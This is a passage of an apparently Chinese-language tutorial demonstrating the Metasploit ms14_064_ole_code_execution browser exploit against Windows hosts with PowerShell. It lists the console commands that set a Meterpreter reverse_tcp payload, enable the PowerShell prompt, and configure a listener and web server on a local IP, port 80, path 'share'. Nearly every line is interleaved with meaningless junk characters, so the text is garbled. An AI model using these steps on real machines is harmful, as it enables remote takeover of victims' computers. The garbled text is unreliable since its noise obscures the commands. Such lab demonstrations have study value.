+ L( ^ Q7 l2 a2 k& u 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 \+ M T- B+ i2 J& ?6 l& Q3 h
/ B% R/ X5 h6 q* b K
' o, L" R; o/ L! s0 \ o0 Y+ D4 p 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
+ E; _' j7 [2 V. `- T- l
, o+ |6 C1 M% T/ P1 N% T% w4 v
) E8 J: Y; m& C0 g: C 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp' F+ c* X1 F0 B+ Z1 {
# X* K/ n: L4 L! q, M
3 J! |/ M/ v; J: X+ R set AllowPowershellPrompt true( W% V9 t# _, h: s
! z+ q7 W6 J; Y3 D) I" C* z8 j3 |9 n$ T5 V5 N/ z
Set LHOST 192.168.0.109& u4 p0 `1 b# o3 V
" R" u: m& z, F1 Z5 h& G1 z+ [7 g( U/ ^2 P, K/ s+ _% s# D U
set SRVHOST 192.168.0.109& ?0 D1 a, Z# j- d5 a( m3 d& {
0 v: y/ m4 p( p3 Q
* r" D) s3 G6 ?8 C& H: D
Set uripath share- e M) k5 i$ M; \
s+ d" a+ P4 |9 X6 C, }* C
6 K! o' V/ L ?- t
Set srvport 80
' p0 h9 b8 X* a
- E3 y( D& @$ v2 K* b
4 ^ u' d4 c! @% [( M. L , i5 u0 s" z* J! M9 A
5 j8 O0 C+ k* g7 x
8 J4 l9 c$ s" h7 u6 X: K1 D8 C+ s
3 q/ B: U5 [( L: e
! N& r3 B0 X0 M; |7 e# r4 _5 M
# {/ ?, v" `0 E1 m- Z
+ G, ^* _* P- S7 u, {
/ }; e! Y' i$ a' o3 ~) C
% r' z0 ~6 g6 T' Z: b, y
: A! r/ [) m8 }7 _
7 Y+ O; ]: U+ T2 Y
9 E/ h. z9 n' k$ C! ]2 _
5 ?) o; Y/ T, ^- w
2 Y. g0 W* n) I/ p
0 C$ Q! Y7 r" I4 T+ Z 下面我们来访问本地地址如图:- s$ F0 M. L0 E$ p# l$ ^+ u- U
$ V* L i8 r7 ~) m
2 H5 F+ }- q% K3 q7 E4 i
! h m' u) P2 k
* J4 H+ h Q) R5 y! E0 [ M
+ `6 x3 @* k0 f) n6 e1 a
5 u* m# A8 s" Y i
x) h$ E1 }' l. E; I
h& j4 S' P* c
: t. H' @( K1 k9 a: s! t